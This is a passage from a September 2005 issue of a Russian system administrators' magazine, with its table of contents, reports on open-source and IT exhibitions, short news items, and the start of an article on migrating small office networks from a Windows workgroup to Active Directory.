Так видит журнал читатель, который забыл оформить подписку:

СЬ

ЛИ
ЛИ
ТЯ Е

Ж ПИ
ЗА ДНИ
НУ

РА КУ
ЛЫ ГО

ТИ РАС
КУ ВО

О
НИ НО

ТР
№9(34) сентябрь 2005

С
БЫ
подписной индекс 81655
КА

www.samag.ru

Клонируем Windows

И
ЬГ
с помощью Symantec Ghost

ЬД О
РА СКА
ТЕ
К

ИС НН
ЕН
УС

БО
НА ТПУ

ИЛ ДА
ТП

НЧ ЖИ
ВО

РА Е О

КО НЕО
АВ СЛ
Л

Подключаем сетевые ресурсы

Л
ХА

ПО
УЕ

ЗА
в автоматическом режиме
Active Directory
Directory вместо
Так видит журнал читатель, оформивший подписку: рабочей группы
Устойчива ли ваша сеть?
WHoppix проверит!
Как спасти данные,
если отказал жесткий диск
«Бритва» для спама:
обзор анализатора Razor
Все ли возможности ClamAV
вы используете?
ПОДПИШИТЕСЬ И ЧИТАЙТЕ! Протокол SILC обеспечит вам
№9(34) сентябрь 2005

безопасную конференц-связь
Роспечать – 81655
Пресса России – 87836 Аккуратная настройка SSI
Интер-почта – тел. (095) 500-00-60
 оглавление
2 РЕПОРТАЖ 62 Устойчива ли ваша сеть?
Проверьте с помощью WHoppix!
7 ТЕНДЕНЦИИ LiveCD-дистрибутив WHoppix поможет протестировать
систему на устойчивость к сетевым вторжениям.
АДМИНИСТРИРОВАНИЕ Илья Александров
ilya_al@rambler.ru
8 Домены Windows 2000/2003 –
отказываемся от рабочей группы 68 Определяем уязвимость веб-сервиса
Как безболезненно перейти к доменной структуре. с помощью Acunetix Web Vulnerability
Роман Марков Scanner
stepan-razin@newmail.ru Протестируйте свой веб-сайт на наличие слабых мест.
Сергей Яремчук
12 Symantec Ghost, grinder@ua.fm
или Как сделать клон своими руками
Эффективно управляем рабочими станциями. WEB
Михаил Платов
platov@cs.vsu.ru 70 Аккуратная настройка SSI
Оптимизации SSI уделяется очень мало внимания. Се-
20 Подключаем сетевые ресурсы годня мы восполним этот пробел.
в автоматическом режиме Алексей Мичурин
Создаем скрипт для интеллектуального управления alexey@office-a.mtu-net.ru
сетевыми дисками. Иван Коробко
ikorobko@prosv.ru СЕТИ
28 Управляем удаленными базами AIDE 76 Протоколы сетей хранения данных
Часть II – AIDEstart Часть I – ATA over Ethernet
Скрипт AIDEStart очень пригодится вам для запуска Первая статья из цикла о протоколах SAN-сетей.
AIDE на взломанной или поврежденной машине. Антон Борисов
Рашид Ачилов a.borisov@tesv.tmb.ru
shelton@granch.ru
HARDWARE-ПРАКТИКУМ
32 Создаем загружаемый Flash-диск
с FreeBSD и DOS. Часть I 80 Как спасти данные,
Методика создания образа своими руками. если отказал жесткий диск
Рашид Ачилов Ремонт и востановление жестких дисков.
shelton@granch.ru Крис Касперски
kk@sendmail.ru
42 Организуем доступ в Интернет
с использованием биллинговой системы РЕТРОСПЕКТИВА
FreeNIBS
Система доступа к Сети с гибким инструментом адми- 88 С чего начинался российский Интернет
нистрирования. Евгений Литвиненко Наша история: первые десять лет развития русского
evg_ltv@mail.ru сегмента Сети.
Алексей Коршунов
46 «Бритва» для спама akeeper@akeeper.ru
Обзор сигнатурного анализатора Razor.
Сергей Супрунов КНИЖНАЯ ПОЛКА
amsand@rambler.ru
92 Обзор книжных новинок
48 Настраиваем основные компоненты Александр Байрак
почтового сервера x01mer@pisem.net
Связка Postfix + MySQL + Courier-IMAP + fetchmail +
SquirrelMail. Евгений Литвиненко 19, 27, 31, 41 BUGTRAQ
evg_ltv@mail.ru

БЕЗОПАСНОСТЬ
52 Все ли возможности ClamAV
вы используете?
Функциональность ClamAV гораздо шире, чем простое
сканирование файлов на вирусы. Все на
подпи
Авраменко Андрей
liks@altlinux.ru ску-20
06!
56 Протокол SILC обеспечит вам
безопасную конференц-связь
Организуем безопасное общение по незащищенным
каналам.
Сергей Яремчук
grinder@ua.fm

№9, сентябрь 2005 1

 репортаж

В ПОСЕЛКЕ АРХЫЗ УСПЕШНО ПРОШЕЛ

OPEN SOURCE FORUM 2005

С 15 по 17 сентября в посёлке Архыз состоялся Open Source Forum 2005. Его организаторы –
ITX Community совместно с Северо-Кавказской группой пользователей Linux (NC LUG) уже
второй год собирают специалистов, связанных с движением Open Source. Участники форума
получили возможность не только обменяться опытом разработки и внедрения открытых
решений, обсудить последние события в мире информационных технологий, но и пообщаться
с единомышленниками в неформальной обстановке. Да и просто хорошо отдохнуть
в экологически чистом, живописном уголке России на высоте 1470 метров над уровнем моря,
вдали от цивилизации.

М
ожно считать, что форум начал свою работу еще
в Ростове-на-Дону, за несколько часов до отъез-
да в п. Архыз. Ожидание автобуса как-то незамет-
но перетекло в дебаты о различных дистрибутивах Linux и
подобные темы. Да и в самом автобусе споры не прекра-
щались почти до самого пансионата.
По различным причинам в Архыз съехалось заметно
меньшее количество участников, чем было зарегистри-
ровано, тем не менее были представлены многие регио-
ны России (Москва, Рязань, Каменск-Уральский, Уренгой
и др.), так что OSF’05 можно совершенно обоснованно на-
звать всероссийским мероприятием.
Первый официальный день работы форума начался
с выступлений организаторов и спонсоров. Президент ITX
Community Артем Солодченко пояснил цели и задачи, кото-
рые организация ставит перед собой, проводя OSF. Пред-
ставитель консалтинговой службы Novell Виталий Сайфул-
лин рассказал присутствующим о взглядах Novell на движе-
ние Open Source, а также продемонстрировал SUSE Linux
Enterprise Server 9.
В дальнейшую работу форума по техническим причинам
(пансионат остался на несколько часов без электричества) бы-
ли внесены некоторые коррективы, и первые доклады участ-
ников проходили прямо под открытым небом, что сделало об-
щение еще более неформальным. Практически каждое вы-
ступление вызывало неподдельный интерес и порождало на-
столько горячие и продолжительные споры, что организаторы
уже и не пытались вернуть участников в рамки регламента.

2
 репортаж
Диапазон тем, затронутых выступающими, был весь-
ма широк: от вопросов использования бездисковых тер-
миналов в локальных сетях предприятий и преимуществ
FreeBSD-шлюза перед решениями на базе Windows до при-
кладных аспектов безопасности операционных систем и
проблем лицензирования ПО.
Второй день начался с экскурсии на Софийские водо-
пады. Каждый горел желанием совершить хотя бы неболь-
шое восхождение, так что рабочая часть была отодвинута
на вечер. Началась она с выступления Дениса Сосновцева
(IBM, Центр компетенции Linux), рассказавшего присутству-
ющим о поддержке компанией IBM движения Open Source, а
также представившего разработку IBM Workplace. По мне-
нию представителя IBM, Linux не должен повторить судь-
бу UNIX, разбившись на несколько десятков независимых
проектов. Тем не менее в компании видят необходимость Ростов-на-Дону, перед отъездом
сохранить для конечных пользователей возможность вы-
бора между несколькими поставщиками решений.
Слушание докладов, уже «при поддержке» проектора,
продолжалось почти до полуночи. Этот день можно назвать
днем разработчиков – основная доля выступлений касалась
конкретных решений. Были представлены примеры трех-
звенных приложений на базе Mozilla, один из разработчи-
ков RTK Linux рассказал об особенностях этого дистрибу-
тива. Обсуждение каждого доклада по-прежнему стреми-
лось затянуться на неопределенный срок.
Последний день был посвящен оставшимся докладам
и завершающим выступлениям. Наибольший интерес при- Дмитрий Яценко – координатор проекта
влек доклад Николая Кривченкова (Рязанский LUG) на тему
«Система оптического распознавания для Linux». Помимо
огромной работы собственно по разработке системы автор
представил и потрясающий по качеству видеоматериал, ко-
торый сделал доклад ярким и незабываемым.
По дороге домой кое-где в автобусе еще продолжались
споры о том, насколько «тонкими» должны быть клиенты,
о преимуществах и недостатках Slackware и т. п. Было оче-
видно, что форум удался…
В целом можно сказать, что задачи, поставленные перед
форумом, были полностью выполнены. Всего было заслу-
шано 11 докладов, и каждый увозил домой не только мас-
су полезной информации, множество свежих идей и подар- Д. Сосновцев (Центр компетенции Linux, IBM): «Мы черпаем
ки от спонсоров, но и самые лучшие впечатления от заме- вдохновение в свободном ПО и все больше и больше в него
втягиваемся»
чательной природы, общения с хорошими людьми, а так-
же желание еще глубже окунуться в необъятный и полный
возможностей мир Open Source.
Спонсорами форума выступили компании IBM и Мега-
фон, техническую и информационную поддержку оказала
компания Novell, порталы OpenNET, nixp.ru, журнал «Сис-
темный администратор», представительство D-Link в Рос-
тове-на-Дону и ряд других компаний и организаций.
Хочется поблагодарить организаторов и всех, кто под-
держал идею проведения данного мероприятия, за пре-
красно (а главное – с пользой) проведенное время, и выра-
зить надежду, что в следующем году форум пройдет с еще
большим размахом. Ну а мы будем следить за новостями
на сайте проекта: www.itx.ru.

Сергей Супрунов
Фото автора
Экскурсия к водопадам

№9, сентябрь 2005 3

 репортаж
ТРИ СПЕЦИАЛИЗИРОВАННЫЕ ВЫСТВКИ
ОДНОВРЕМЕННО ПРОШЛИ В ГОСТИНОМ ДВОРЕ
О
рганизаторами выступили вы- сутствовал даже стенд от абсолютно
ставочное объединение «Рес- некоммерческого проекта – свободной
тэк» совместно с компанией ReactOS. Среди участников можно на-
Reed Exhibitions и IDG World Expo. звать IBM, Red Hat, Oracle, Intel, Novell,
Стенды LinuxWorld занимали не R-Style, ALT Linux, ASPLinux, Линукс
треть, а визуально не более одной пя- Инк, Инвента, Linuxcenter.Ru, Naumen.
той площади. Тем не менее на выстав- Наибольшее оживление царило
ке было представлено большое число у стенда компании Linuxcenter.Ru. Впро-
как отечественных, так и зарубежных чем, это и неудивительно – помимо то-
компаний, занимающихся бизнесом, го, что данный стенд был единственным
связанным с Linux и Open Source. При- мини-магазином на выставке, где мож-
но было приобрести с де-
сяток разных дистрибу-
тивов ОС Linux и различ-
ную атрибутику, компания
представляла обществен-
ности сразу две новин-
ки. Это новый ежемесяч-
ный переводной журнал,
целиком посвященный
ОС Linux – LinuxFormat,
и вторая новинка – пред-
ставленный совместно
с питерским ветераном
российского рынка свобод-
ного ПО – Линукс Инк дис-
трибутив Scientific Linux 4.1
Cyrilic Edition, обзор кото-
рого вы сможете прочесть
в следующем номере на-
шего журнала.
Говоря о русифициро-
На стенде журнала – исполнительный директор
Владимир Положевец и автор Андрей Маркелов ванных дистрибутивах, не-
4
Сентябрь в этом году
выдался «урожайным»
на выставки.
С 7 по 9 сентября в самом
центре столицы, на Ильинке,
в выставочном комплексе
«Гостиный Двор» прошли
сразу три выставки – первая
в России Международная
специализированная
выставка-конференция
LinuxWorld Russia 2005,
а также Infosecurity Russia
и StorageExpo.
льзя не упомянуть о сделанном на вы-
ставке заявлении вице-президента
Red Hat по международным прода-
жам о том, что Red Hat начинает офи-
циальную поддержку русского языка в
Red Hat Enterprise Linux и предоставит
своим клиентам официальную подде-
ржку на русском языке. Возможно, этот
шаг необходимо было сделать несколь-
ко раньше – это бы поспособствовало
большей популярности данного дист-
рибутива корпоративного уровня. По-
ка же на территории России подде-
ржку на русском языке осуществляли
московская «Инвента» и «Линукс Инк»
из Санкт-Петербурга. Достаточно ин-
тересной была демонстрация откры-
той операционной системы ReactOS.
Данная ОС, разрабатываемая в рам-
ках проекта Open Source, совместима
с приложениями и драйверами линей-
ки ОС Windows NT. Коллектив разра-
ботчиков тесно взаимодействует с про-
ектом Wine – осуществляется взаи-
мовыгодный обмен кодом. На выста-
ке была продемонстрирована уже ста-
бильно работающая реализация стека
TCP/IP. В ближайшее время планирует-
ся добиться стабильной работы пакета
MS Office и бухгалтерских програм раз-
работки 1С. Из примерно 25 разработ-
чиков ReactOS трое – наши соотечес-
твенники. ReactOS распространяется

по лицензии GNU и доступна для за-
грузки всем желающим на сайте http://
www.reactos.com. Будем надеяться, что
и в следующем году LinuxWorld распах-
нет двери посетителям, и представит
множество интересных новинок.
В этом году выставка Infosecurity
прошла при поддержке аппарата Со-
вета безопасности РФ, Федеральной
службы по техническому и экспортно-
му контролю РФ, Федерального агент-
ства по информационным технологиям
РФ, Федеральной службы безопаснос-
ти России, МОО «Ассоциация Защиты
Информации».
Приняли участие крупнейшие произ-
водители и поставщики, такие как – Aladdin
Software Security R.D., Cisco Systems,
Check Point Software Technologies Ltd.,
IBM, Internet Security Systems, McAfee,
Nortel, Sun Microsystems, Symantec,
Trend Micro, ДиалогНаука, ИНФОРМ-
ЗАЩИТА, Лаборатория Касперского,
ЭЛВИС-ПЛЮС, а также крупнейшие
дистрибьюторы и интеграторы – АМТ
Груп, Инфосистемы Джет, TopsBI, Груп-
па компаний КомпьюЛинк, Корпорация
ЮНИ, ЛАНИТ, ТехноСерв.
Отличительной особенностью ста-
ла насыщенная конференционная про-
грамма: 4 «круглых стола», 8 секцион-
ных заседаний, 17 программных вы-
ступлений и 33 семинара компаний-
участников выставки прошли одновре-
менно в четырёх конференц-залах.
Storage Expo Russia является пре-
емницей серии выставок Storage Expo,
успешно проводимых компанией Reed
Exhibitions в 10 странах мира (www.
storage-global.com). Были представле-
ны новые решения по хранению дан-
ных от крупнейших производителей
и поставщиков, таких как Adaptec, Cisco
Systems, EMC Computer Systems, Hitachi
Data Systems, Hewlett-Packard, IBM,
Network Appliance, Sony, StorageTek, Sun
Microsystems, Symantec, Электронный
архив, а также крупнейших дистрибью-
торов и интеграторов – АМТ Груп, Инфо-
системы Джет, КРОК, ТехноСерв, INLINE
Technologies, Kraftway, TopsBI и другие.
Можно сказать, что все три выставки
удались, и каждый из посетителей мог
найти что-то интересное для себя.
Андрей Маркелов
репортаж
Никлаус Вирт выступил
с лекцией в Москве
21 сентября в Московском Поли-
техническом музее прошла лекция
знаменитого ученого с мировым
именем, профессора Высшей По-
литехнической школы ETH г. Цюри-
ха, «отца структурных языков про-
граммирования» Никлауса Вирта
(Niklaus Wirth).
Его приезд в Россию был приуро-
чен к празднованию 250-летия МГУ
им. Ломоносова и 150-летию швейцар-
ского ETH. Лекция называлась «Ис-
тория и перспективы языка Оберон».
В лекции профессор кратко расска-
зал о истории создания языка Обе-
рон. Путь к Оберону лежал через язы-
ки программирования Паскаль и Мо-
дула-2, автором которых также явля-
ется Вирт. По окончании лекции, отве-
чая на вопросы слушателей, профес-
сор поделился некоторыми интерес-
ными замечаниями, напрямую не от-
носящимися к теме доклада. Напри-
мер, собравшиеся в аудитории могли
узнать, что Вирту не нравится термин
ООП «наследование», поскольку, как
он сказал, «наследуют обычно, когда
кто-то умер». Также профессор поже-
лал российским коллегам поменьше
оглядываться на США и не копиро-
вать вслепую американскую модель
ценностей, что, как он заметил, про-
исходит сейчас.

Андрей Маркелов
Площадка Infosecurity Фото автора
с
он

27-28 Конференция для разработчиков программного обеспечения

ан

октября Software Engineering Conference (Russia)

Основные темы, которые будут представлены на конференции, – последние технологии в сфере разработки ПО, управление про-
цессами разработки ПО, управление человеческими ресурсами. Предполагаемая аудитория конференции – более 700 специалис-
тов в области разработки ПО из России и стран СНГ, а также приглашенные гости и «гуру» из США и Европы. Конференция для раз-
работчиков программного обеспечения SEC(R) будет проходить в Москве, в Международном информационно-выставочном центре
«ИнфоПространство». Регистрация участников на сайте конференции: http://secr.ru.

№9, сентябрь 2005 5

 репортаж
ИТОГИ ВЫСТАВКИ SOFTOOL 2005
Вслед за LinuxWorld Russia 2005 в конце сентября в Москве уже в шестнадцатый раз
посетителям открыла двери крупнейшая в России ежегодная Международная выставка
информационных технологий SofTool 2005.
К
аждый год SofTool собирает практически все более-
менее известные российские и зарубежные ком-
пании, работающие в сфере IT, представляющие
на стендах свои новые достижения за прошедший год.
В этом году под крышей просторного павильона их собра-
лось более трех сотен. Мероприятие традиционно проводит-
ся при поддержке Российской академии наук, Федерально-
го Агентства по промышленности, Федерального Агентства
по науке и инновациям, Федерального Агентства по инфор-
мационным технологиям и Правительства Москвы.
Из самых крупных и известных компаний, принявших
участие в выставке, можно назвать ABBYY Software House,
IBM, Intel, Microsoft, фирма 1С, АйТи, АСКОН, Гарант, Кон-
сультант Плюс, Корпорация Галактика, Лаборатория Кас-
перского, Корпорация Парус и многие другие.
На отдельных площадках выставки был развернут це-
лый ряд специализированных экспозиций. Так, в рамках
«Мира Академии» свои разработки представили более де-
сяти научных институтов Российской академии наук. Сек-
ция под названием «DocFlow» знакомила посетителей с ре-
шениями по автоматизации управления и системами элект-
ронного документооборота. На втором этаже была развер-
нута экспозиция «САПР’экспо–2005». Как следует из на-
звания, она была посвящена системам автоматизирован-
ного проектирования.
В течение всего времени работы выставки SofTool 2005
проводилась специализированная экспозиция – LinuxLand
(www.linuxland.ru). Ее организаторами выступили компа-
нии Линуксцентр и Линукс Инк. Как легко понять из назва-
16 лет – солидный возраст для IT-выставки. SofTool всё это
время сохраняет свою актуальность
6
ния, это мероприятие было целиком и полностью посвяще-
но Linux и Open Source. По замыслу организаторов (кото-
рый, впрочем, был реализован в полной мере), предпола-
галось собрать под одной крышей различных производи-
телей и поставщиков решений для открытой ОС: ASPLinux,
MOPSLinux, Smart Software, EterSoft, Linux Format, LYNX
Education Center, Linux Ink и CITKIT. Кроме традиционных
стендов и демо-зоны, участники выставки могли посетить
конференцию или тематические мастер-классы: «Бизнес
и Linux», «Информационная безопасность», «Linux в обра-
зовании», «Технологические горизонты». На конференции
прозвучали доклады как от лидеров индустрии (IBM, HP,
Novell, Vdel Ltd./Red Hat), так и самостоятельных разработ-
чиков. Настоящий шквал вопросов вызвала презентация
Алексея Брагина, представившего ReactOS – свободную ре-
ализацию операционной системы, совместимой с Microsoft
Windows на уровне драйверов и прикладных программ.
Неизменной популярностью среди посетителей пользо-
вались и мастер-классы, которые часто проходили в «ин-
терактивном» режиме. В частности, компания R-Style раз-
вернула сервер HP Proliant DL380 прямо в конференц-за-
ле и не на словах, а на деле доказала легкость и просто-
ту настройки и использования решений на базе HP/Linux.
Интерес вызывали и матер-классы, посвященные LiveCD
Knoppix 3.7 RE (секция «Linux в образовании»), новой сис-
теме борьбы с нежелательной корреспонденцией, доклад
об Asterisk Дениса Смирнова и другие.
Можно сказать, что экспозиция прошла удачно. Система
1С:Предприятие, работающая под управлением Linux и де-
монстрируемая в режиме он-лайн на стенде Etersoft, собира-
ла вокруг себя множество заинтересованных. Многие люди
приходили на LinuxLand не только затем, чтобы приобрести
(или получить в подарок) какие-либо продукты, но и для то-
го, чтобы поговорить с разработчиками, задать вопросы и
получить на них ответы. По сравнению с предыдущими вы-
ставками SofTool, не имевшими специализированной экс-
позиции, посвященной Open Source, можно отметить значи-
тельное уменьшение числа «случайных прохожих», то есть
людей, случайно заглянувших на стенд. Большая часть по-
сетителей Linux Land приходила целенаправленно на эту эк-
спозицию, а некоторые с мастерством истинных ценителей
– на определенный мастер-класс. Поэтому, несмотря на оп-
ределенные (кто-то может сказать – неизбежные для пре-
мьеры) технические накладки, можно сказать, что LinuxLand
удался. Хочется надеяться, что это мероприятие станет пер-
вым в длинной череде экспозиций, посвященных Linux и про-
движению открытых технологий в России!
Андрей Маркелов, Валентин Синицын
Фото Юрия Афанасьева

OpenOffice.org переходит на GNU LGPL
Компания Sun Microsystems объявила об отказе от лицен-
зии Sun Industry Standard Source License (SISSL), в связи
с чем с SISSL прощаются и все открытые проекты Sun, ра-
нее использовавшие эту лицензию. Продукты Open Source,
практиковавшие схему двух лицензий, одной из которых бы-
ла SISSL, перешли к упрощению своей схемы лицензиро-
вания. Так, например, все релизы OpenOffice.org, что будут
(и были) выпущены после выхода 2.0 Beta 2, распространя-
ются только на условиях GNU LGPL. Первой ласточкой стал
OOo 2.0 RC1, анонсированный в конце сентября.
Противоречия в Mambo привели
к появлению Joomla
Группа разработчиков из проекта по созданию открытой
CMS – Mambo – обнародовала собственную версию сис-
темы под названием Joomla. Релиз Joomla 1.0 основан
на Mambo 4.5.2.3, в него добавлены исправления оши-
бок и уязвимостей в безопасности. Так же, как и Mambo,
Joomla распространяется под лицензией GNU GPL. Разно-
гласия в проекте Mambo возникли в августе, когда разра-
ботчики отделились от компании Miro International, что ос-
новала Mambo, а позже превратила его в источник дохо-
дов. Почву для противоречий заложили вопросы управле-
ния ПО и контролирования интеллектуальной собственнос-
ти. Для этой задачи компанией Miro была учреждена орга-
низация Mambo Foundation, однако разработчики заявили,
что реальный контроль сохранила за собой компания.
Firefox скачали 90 миллионов раз
20 сентября (в 09:33:58 по Гринвичу) количество закачек
открытого веб-браузера Firefox достигло отметки в 90 мил-
лионов раз. Таким образом, до достижения заветных
100.000.000 скачиваний за первый год с момента выхода
Firefox 1.0 (9 ноября 2004) осталось преодолеть последнюю
десятую часть пути.
тенденции
ряна или украдена», – прокомментировал Петер Ларссон,
исполнительный директор Pointsec Mobile Technologies.
KNOPPIX вновь доступен и на LiveCD
Вышедший во второй половине сентября очередной ре-
лиз KNOPPIX – 4.0.2 – ознаменовал собой возврат к под-
держке редакции этого Linux-дистрибутива для LiveCD,
а не только LiveDVD, как это было с двумя предыду-
щими версиями. Кроме того, в KNOPPIX 4.0.2 прове-
дены обновления пакетов xserver-xfree86, xlibs, mozilla-
firefox и unionfs (до 20050921-1507), исправлены некото-
рые опции загрузки, а на DVD добавлены freemind, Debian
Anwenderhandbuch V3.0, amarok 1.2.4.
DragonFly BSD переходит на pkgsrc
Мэтт Диллон в почтовой рассылке пользователей DragonFly
объявил о том, что в следующем релизе ОС DragonFly BSD
официальной системой управления пакетами будет pkgsrc.
Система пакетов NetBSD придет на смену «dfports» (версия
портов FreeBSD с исправлениями для DragonFly). Именно
pkgsrc, а не dfports разработчики предпочитали использо-
вать последние месяцы, так что переход стал вполне логич-
ным звеном эволюции DragonFly BSD. Система pkgsrc пор-
тируема, разработана NetBSD и официально поддержива-
ется проектом DragonFly с октября 2004 года. Позже на мо-
лодую BSD-платформу был портирован код стека беспро-
водных устройств из ОС FreeBSD.
Составил Дмитрий Шурупов
по материалам www.nixp.ru

Появилась бета-версия Firefox 1.5

В начале месяца был представлен первый бета-релиз
Firefox 1.5 (Deer Park), среди новшеств которого можно вы-
делить систему автоматического обновления, улучшенную
блокировку всплывающих окон, усовершенствованную под-
держку Mac OS X, возможности DnD для вкладок. Финаль-
ный релиз Firefox 1.5 ожидается позже в этом году.

Pointsec анонсировала «полнодисковое

шифрование» для Linux
Компания Pointsec представила свой программнный про-
дукт для конечного Linux-пользователя, реализующий тех-
нологию FDE (full disk encryption, «полнодисковое шифро-
вание»), защищающую все данные на жестком диске. По
словам производителя, Pointsec for Linux предназначен для
«крупных технологических и телекоммуникационных корпо-
раций, нуждающихся в защите интеллектуальной собствен-
ности, хранимой на настольных компьютерах и лаптопах».
«Мы наблюдаем растущий мировой спрос на шифрование
данных на конечном оборудовании, таком, как ноутбуки, со
стороны многих индустрий, т.к. компании осознают угрозу
для информации, хранимой на их ПК, что может быть уте-

№9, сентябрь 2005 7

 администрирование

ДОМЕНЫ WINDOWS 2000/2003 –

ОТКАЗЫВАЕМСЯ ОТ РАБОЧЕЙ ГРУППЫ

РОМАН МАРКОВ
Что делать, когда ваша сеть, сконфигурированная в качестве рабочей группы Windows,
перестала удовлетворять требованиям управляемости и удобной масштабируемости?
Ответ один – переходить на Active Directory! Однако прежде чем начинать подобный проект,
необходимо хорошо знать все его нюансы.

Т
енденция быстрого роста локаль-
ных сетей небольших компаний
наблюдается в наши дни повсе-
местно. Сначала это два-три компью-
тера для бухгалтерии, затем еще по
одному для директора, его замести-
теля, секретаря, нескольких менедже-
ров и т. д. Через какое-то время их ко-
личество опять увеличивается, так как
штат сотрудников расширяется. Одна-
ко изначально все эти компьютеры яв-
ляются членами рабочей группы, в ко-
торой каждый участник равноправен.
Администрировать такую сеть стано-
вится неудобно, так как понятия «цент-
рализованное управление» и «рабочая
группа» являются взаимоисключаю-
щими.
Именно в этот момент вам приходит-
ся принимать решение о переходе к до-
менной структуре (Active Directory).
С какими трудностями вам при-
дется столкнуться в первую очередь?
Что необходимо предусмотреть зара-
нее, чтобы процесс перехода прошел
без сучка и задоринки? Сегодня я по-
пытаюсь обобщить свой опыт подоб-

8

ных внедрений, чтобы заранее облег-
чить вашу задачу.
План перехода к Active
Directory
Для реализации подобного перехода
необходимо заранее составить план
своих действий. Наибольшей произ-
водительности своего труда вы достиг-
нете, выполняя все настройки в нера-
бочее время. Оптимальным решени-
ем является использование выходных
дней, так как при количестве рабочих
станций более 5-7 за один вечер завер-
шить перевод скорее всего не удастся.
Необходимо помнить о том, что любые
работы по глобальной перенастрой-
ке системы могут занять в несколько
раз больше времени, чем планирова-
лось. Поэтому вы должны быть увере-
ны в том, что расчетное время завер-
шения всех работ в два(!) раза меньше
имеющегося в наличии. В противном
случае вы рискуете получить нерабо-
тоспособную систему в момент выхо-
да пользователей на работу.
Роль контроллера домена (да-
лее КД) лучше доверить выделенно-
му для этих целей компьютеру (серве-
ру). Понятие «выделенный» в данном
случае означает, что никто не должен
использовать его в качестве рабочей
станции. Эта рекомендация известна
всем, но тем не менее еще раз напо-
минаю об этом. Для несения роли КД
для 10-30 рабочих станций и такого же
количества пользователей подойдет
любой компьютер, удовлетворяющий
требованиям ОС Windows Server – на-
грузка на него при таких условиях бу-
дет невелика. Вполне достаточно сле-
дующей конфигурации: Celeron-700,
256 RAM, 10 HDD. Однако не стоит за-
бывать, что даже в небольших сетях
должна обеспечиваться отказоустой-
чивость, поэтому КД в домене долж-
но быть более одного.
Акцентирую ваше внимание на том,
что данная статья не является техни-
ческой инструкцией по настройке конт-
роллера домена, введению в домен ра-
бочих станций, заведению учетных за-
писей пользователей и пр. Об этом вы
можете прочитать в [1], где вы найде-
те советы по планированию перехода
от рабочей группы к домену.
Следующий этап – подготовка сер-
вера и клиентских рабочих мест.
Для того чтобы сделать переход к до-
№9, сентябрь 2005
менной структуре абсолютно прозрач-
ным для пользователей, необходимо
создать и заполнить анкеты для каж-
дого рабочего места локальной сети.
Если за одним компьютером работа-
ют несколько пользователей, исполь-
зующих различные учетные записи
(или программное обеспечение), то та-
кую анкету должен заполнить каждый
из них. Форма может быть произволь-
ной, главное, чтобы были заполнены
требуемые поля. Это: имя компьюте-
ра в сети, ФИО пользователя, имя его
учетной записи, пароль, используемые
программы, расположение рабочих до-
кументов и пр. Пример заполненной
анкеты приведен на рис. 1.
Обяжите каждого пользователя се-
ти заполнить подобную табличку перед
началом модернизации. Эту процеду-
ру полезно выполнять перед любыми
действиями по переконфигурирова-
нию пользовательских компьютеров –
после переустановки системы вы вос-
станавливаете все, что попросил поль-
зователь. Если он об этом в данном от-
чете не упомянул – значит, вы тем бо-
лее не могли знать, чем он пользуется.
Главное провести правильную предва-
рительную беседу, рассказав, для чего
необходимо заполнять такую карточку
и что вы не будете нести ответствен-
ности за те данные, которые не были
описаны. Конечно, такой подход более
применим к внедренческим фирмам
и не всегда возможен для штатного со-
трудника, однако он зарекомендовал
себя с лучшей стороны. Иначе – в слу-
чае потери данных виноватым всег-
да окажется системный администра-
тор, который должен был на астраль-
ном уровне догадаться, что пользова-
тели хранят все документы в корзине!
Поверьте – я не фантазирую – это ре-
альная история из опыта нашей фир-
мы. Сотрудник, приехавший по заявке
клиента о нехватке на диске свободно-
го места, первым делом очистил корзи-
ну. Оказалось, что бухгалтер хранил в
ней все документы. На вопрос: «Как же
вы их сохраняли?!» последовал невоз-
мутимый ответ: «Сохраняла на рабо-
чем столе и перетаскивала».
Внимательно отнеситесь к бухгал-
терским рабочим станциям – как пра-
вило именно они изобилуют «нестан-
дартными» программами, такими как
Банк-клиенты и специализированные
программы налоговой отчетности. За-
администрирование
Рисунок 1. Подобную анкету должен
заполнить каждый пользователь
ранее проконсультируйтесь с техни-
ческой поддержкой производителей
программ на предмет того, что именно
вы должны архивировать. Некоторые
такие программы защищены от копи-
рования, поэтому после переустановки
системы просто перестанут работать,
что может явиться крайне критичным,
так как невозможность осуществить
срочный платеж через систему Банк-
клиент – серьезная проблема для орга-
низации. Заранее договоритесь о вы-
зове специалиста для переустановки
подобных программ.
Полезные технические
подробности
С технической точки зрения рекомен-
дуется использовать на рабочих стан-
циях операционные системы не ни-
же Windows 2000, так как более ран-
ние версии систем (Windows9x/ME,
Windows NT) не позволяют в полной
мере распространять на них доменные
политики и настройки. Поэтому при на-
личии возможности (технические ха-
рактеристики компьютера и пр.) пере-
установите ОС там, где необходимо.
Помните, что перед любыми подоб-
ными работами необходимо создавать
архивную копию всех данных, нахо-
дящихся на перенастраиваемых сер-
верах. Опыт показывает, что нелиш-
ним будет создать архивную копию
даже тех дисковых разделов, которые
вы не собираетесь затрагивать в про-
цессе работы – лучше быть спокой-
ным за то, что все продублировано, чем
«случайно» установить новую систему
не в тот раздел. Конечно, такое напо-
минание многим может показаться из-
лишним – ведь это и «само собой ра-
зумеется». К сожалению, практика по-
казывает, что даже опытные специа-
листы иногда игнорируют это правило,
9
 администрирование
желая сэкономить время (действитель-
но, процесс архивации данных – самый
длительный и утомительный).
Перед основным этапом работ про-
верьте следующее:
! Должна быть сделана полная ко-
пия всех рабочих данных с сервера.
Их необходимо хранить отдельно,
на носителе, который вообще ни-
как не участвует в рабочем процес-
се. После архивирования проведи-
те процедуру контрольного восста-
новления – не всегда удается ско-
пировать все по каким-либо причи-
нам (права доступа и пр.) Хорошей
проверкой на полноту архивации
является перемещение, а не копи-
рование файлов – тогда после за-
вершения процедуры на источнике
не должно остаться исходных дан-
ных. Если что-то осталось – про-
верьте, скопировалось ли на ре-
зервный носитель. Если есть воз-
можность, сделайте две копии – од-
ну на любую рабочую станцию в се-
ти, имеющую необходимый объ-
ем дискового пространства, а вто-
рую – на указанный носитель, ко-
торый сразу уберите подальше.
! Наличие возле каждого рабочего
места заполненных пользователя-
ми анкет, с указанием данных, ко-
торые необходимо сохранить/пере-
нести со старой системы. Подразу-
мевается, что вы сможете расшиф-
ровать записи пользователей, поэ-
тому заранее проведите все уточ-
нения. Также необходимо знать, где
хранятся рабочие данные исполь-
зуемых пользователями программ
и ОС. Будьте осторожны с такими
программами, как Microsoft Outlook
и Microsoft Outlook Express – их фай-
лы данных располагаются в профи-
лях пользователей, причем «зако-
паны» довольно глубоко:
! Данные Microsof t Outlook –
%USERPROFILE%\Local Settings\
A p p l i c at i o n D at a \ M i c r o s o f t \
Outlook\*.pst.
! Данные Microsoft Outlook
Express – %USERPROFILE%\
Local Settings\Application Data\
Identities\{< цифровой код >}\
